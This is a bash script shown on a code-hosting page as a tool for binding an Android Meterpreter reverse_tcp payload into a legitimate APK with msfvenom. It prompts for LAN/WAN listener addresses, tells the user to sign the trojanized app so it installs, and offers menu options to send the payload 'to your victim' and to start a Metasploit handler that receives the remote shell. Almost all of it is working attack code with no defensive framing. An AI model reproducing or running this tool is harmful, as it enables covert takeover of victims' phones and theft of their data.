-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path.binderr
executable file
·116 lines (113 loc) · 3.54 KB
/
.binderr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
#!/bin/bash
PWD=$(pwd)
while true
do
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mYou are generating payload for (LAN/WAN) ==> \e[1;92m"
read lwan
printf "\n"
if [[ $lwan == LAN ]] || [[ $lwan == lan ]]; then
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter LHOST==>\e[0m "
read lht
echo
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter LPORT==>\e[0m "
read lpt
break
elif [[ $lwan == WAN ]] || [[ $lwan == wan ]]; then
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter forwarded HOST==>\e[0m "
read flht
echo
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter forwarded PORT==>\e[0m "
read flpt
echo
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter LPORT==>\e[0m "
read lpt
break
else
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mERROR: PLEASE ENTER A VALID OPTION FROM (LAN/lan) and (WAN/wan)\e[0m\n"
echo
fi
done
printf "\n"
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter your input apk (path/name.apk) ==> \e[0m"
read inputapk
printf "\n"
printf "\e[4;97mCSF \e[0;0;0m> \e[1;31mEnter your output payloadbinded apk (path/name.apk) ==> \e[0m"
read outputapk
printf "\e[1;94mProcessing\e[0m"
printf "\e[1;94m.\e[0m"
sleep 0.3
printf "\e[1;94m.\e[0m"
sleep 0.3
printf "\e[1;94m.\e[0m"
sleep 0.3
printf "\e[1;94m.\e[0m"
sleep 0.3
printf "\e[1;94m.\e[0m\n"
sleep 0.3
printf "\n"
if [[ ${lwan} == lan || ${lwan} == LAN ]]; then
msfvenom -x $inputapk -p android/meterpreter/reverse_tcp LHOST=$lht LPORT=$lpt --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o $outputapk
elif [[ ${lwan} == wan || ${lwan} == WAN ]]; then
msfvenom -x $inputapk -p android/meterpreter/reverse_tcp LHOST=$flht LPORT=$flpt --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o $outputapk
fi
sleep 3
printf "\e[\e[1;34mIn order to make the output apk installable, sign with apk signer\e[0\n"
printf "\e[\e[1;33myou may download apk signer from playstore:- https://play.google.com/store/apps/details?id=com.haibison.apksigner \e[0m\n"
sleep 3
printf "\e[4;97mCSF \e[0;0;0m> \e[1;36mEnter the path to the directory in which your signed payload existing ==> \e[0m"
read pathh
printf "\n"
printf "\e[4;97mCSF \e[0;0;0m> \e[1;36mEnter the signed payload name with (.apk) extension ==> \e[0m"
read signpay
printf "\n"
sleep 2
printf "\e[4;97mCSF \e[0;0;0m> \e[1;33m\e[104mChoose any from option:-\e[0m\n"
echo
while true; do
printf "\e[2;32m01. Send the payload to your victim\e[om\n"; sleep 0.125
printf "\e[2;32m02. Install payload in this device\e[0m\n"; sleep 0.125
printf "\e[2;32m03. Start exploit\e[0m\n"; sleep 0.125
printf "\e[2;32m04. Remove the apk\e[0m\n"; sleep 0.125
printf "\e[2;32m>>Run 'quit' to exit\e[0m\n"; sleep 0.125
echo
printf "\e[4;97mCSF \e[0;0;0m> \e[1;36mEnter your option==> \e[1;32m"
read option
echo
if [[ $option == 1 ]] || [[ $option == 01 ]]
then
cd $pathh && xdg-open --send $signpay
cd $PWD
elif [[ $option == 2 ]] || [[ $option == 02 ]]
then
cd $pathh && xdg-open $signpay
cd $PWD
elif [[ $option == 3 ]] || [[ $option == 03 ]]
then
mkdir -p $PREFIX/tmp
cd $PREFIX/tmp
echo "use exploit/multi/handler" > run
echo "set payload android/meterpreter/reverse_tcp" >> run
if [[ ${lwan} == lan || ${lwan} == LAN ]]; then
echo "set lhost $lht" >> run
elif [[ ${lwan} == wan || ${lwan} == WAN ]]; then
echo "set lhost $flht" >> run
fi
echo "set lport $lpt" >> run
echo "show options" >> run
echo "exploit" >> run
msfconsole -r run
cd - &> /dev/null
cd $PRIFIX/tmp; rm -rf run
cd $PWD
elif [[ $option == 4 ]] || [[ $option == 04 ]]
then
cd $pathh && rm -rf $signpay
cd $PWD
elif [[ $option == quit ]]
then
unset PWD
exit
else
printf "(•) \e[1;31mplease choose a valid option\e[0m\n"
fi
done